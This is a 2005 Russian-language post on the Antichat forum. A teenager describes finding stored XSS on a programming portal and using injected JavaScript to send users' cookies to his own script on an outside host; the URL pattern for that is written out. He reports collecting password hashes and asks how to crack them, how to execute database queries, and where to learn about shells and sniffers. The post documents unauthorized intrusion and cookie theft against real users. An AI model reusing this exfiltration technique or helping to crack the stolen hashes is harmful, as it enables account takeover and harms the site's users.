ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка

Опции темы Поиск в этой теме Опции просмотра

Взлом движка сайта
Старый 05.07.2005, 12:53
Hquak
Guest
Провел на форуме:

Здравствуйте.
Не знаю, куда лучше написать это сообщение, поэтому пишу во флейм, так как написано, что сюда можно писать все(кроме рекламы).

Итак, мне 15 лет, я "увлекаюсь" web-разработками. Думаю, что неплохо владею PHP(+MySQL),HTML,CSS,JavaScript.

Я нашел уязвимость на одном из порталов по программированию. Уязвимость вот какая:

Есть страница редактирования настроек профиля. Там есть поля "Имя", "Email", "Откуда вы" и т.п. После проверки всех полей "на вшивость" я обнаружил, что при редактировании профиля поле "Откуда вы" не обрабатывается функцией htmlspecialchars(), а также не ограничивается в длине. То есть на страницу редактирования собственного профиля можно внедрить абсолютно любой html(+javascript, etc.) код.

Теперь у меня есть несколько вопросов:

1. Почему, когда я вставляю в это незащищенное поле текст типа <? echo "VasiaLamer"; ?>, у меня не выполняется код? При просмотре исходника страницы(view source) этот код написан без изменений. То есть символы < и > не заменены. Как при этом поступить, чтобы можно было выполнить запрос в БД?

2. На странице написания приватных сообщений обнаружена такая же ошибка при попытке "переслать" сообщение другому пользователю. Я сформировал javascript'ом строку вида http://hostname.ru/code.php?cookie="куки"&host="хост"
Где скрипт code.php записывает данные из строки в файлы. В результате я получил несколько хэшей паролей. Что мне с ними делать? Начать подброрку с помощью md5inside?

3. Где можно почитать про то, что такое шеллы и снифферы?